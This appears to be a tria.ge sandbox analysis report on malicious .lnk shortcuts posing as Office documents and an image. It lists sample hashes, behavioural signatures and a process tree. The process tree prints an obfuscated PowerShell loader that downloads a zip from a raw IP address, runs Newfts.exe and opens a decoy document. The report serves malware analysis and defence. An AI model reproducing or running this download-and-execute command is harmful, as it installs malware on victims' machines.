Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1brt_1_0147.doc.lnk
windows7-x64
3brt_1_0147.doc.lnk
windows10-2004-x64
10oshad_88.docx.lnk
windows7-x64
3oshad_88.docx.lnk
windows10-2004-x64
10rv_luti_20...sx.lnk
windows7-x64
3rv_luti_20...sx.lnk
windows10-2004-x64
10telegrama_...pg.lnk
windows7-x64
3telegrama_...pg.lnk
windows10-2004-x64
10Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
30/08/2024, 11:11
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
brt_1_0147.doc.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
oshad_88.docx.lnk
Resource
win7-20240705-en
Behavioral task
behavioral4
Sample
oshad_88.docx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
telegrama_ksv_po_btgr.jpg.lnk
Resource
win7-20240704-en
General
-
Target
oshad_88.docx.lnk
-
Size
15KB
-
MD5
b8fb0340c7a12ae9d4a3847ac14308cb
-
SHA1
4675f3d8a12942068e609fd2f12f2f020fe5762e
-
SHA256
a2bfa5db078137d391b392758fca56b34c8d3c9b0a7e23b1ba9fa9a2edf91000
-
SHA512
d9504ca3211e14412ba697d43983e21d100143c5a68be1799e74a704ac76ee6dc999aef09bcd10fb87b9b975bd8184815b6fc2e90ebd96e4f737244a6546d6b0
-
SSDEEP
48:88muavUQSEfFy63YMEDo/atNixCyQvGDDo/DBdCZZGXu/dZZIa7x:88y8GFy63hXEIxCyQ/zuqQ
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2572 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2660 wrote to memory of 2572 2660 cmd.exe 32 PID 2660 wrote to memory of 2572 2660 cmd.exe 32 PID 2660 wrote to memory of 2572 2660 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\oshad_88.docx.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo sviYiTDifmVgwUmQzFgOPYIV; echo JzJdBqRYxLImYrcCLbpdqvjXsIJfpWlZfWY; echo ZKgorOmcNJZZMbukHvugkdfvZrLIe; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo SRChLBIQjesWVTeXbGypCUPpLnWGEpbzmlAuNYge; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo tAtLAczHKJaDGfRcGQexTEXSHDzsHxFvifZtnswW; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/oshad_88.docx -OutFile oshad_88.docx; echo SQwXgOGQnSfQxMfeOlQMGbil; s''t''a''rt oshad_88.docx2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572
-